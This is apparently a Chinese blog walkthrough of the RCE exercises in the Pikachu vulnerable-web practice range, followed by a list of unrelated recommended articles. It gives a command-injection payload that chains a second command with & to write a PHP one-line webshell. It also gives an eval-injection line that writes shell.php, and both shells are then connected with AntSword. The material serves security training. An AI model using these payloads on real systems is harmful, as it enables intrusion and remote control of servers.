Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
代码熬夜敲Q1 小时前
ENSP 网络工程实验
linux·运维·服务器
銳昊城1 小时前
项目七: 配置与管理Web服务器(2) C2
运维·服务器
Muyuan19981 小时前
30.通过Claude code做项目系统测试
运维·服务器·人工智能·fastapi
yyuuuzz1 小时前
aws的核心概念与常见使用场景
运维·服务器·网络·云计算·aws
KivenMitnick2 小时前
LovelyERes:AWD适用的蓝队综合工具
运维·安全·网络安全
赵药师2 小时前
dpkg: warning: files list file for package ‘libselinux1:amd64‘ missing;
linux·运维·服务器
zt1985q2 小时前
本地部署开源内容管理系统 Typemill 并实现外部访问
运维·服务器·开源
ElevenS_it1882 小时前
网络没完全断但业务已经受影响:「灰色故障」排查的完整方法论
运维·服务器·网络
STDD2 小时前
Samba 文件共享:Linux 服务器与 Windows/Mac 共享文件夹
linux·服务器·windows
liudanzhengxi2 小时前
CRM系统技术文章
linux·服务器·网络·人工智能·新人首发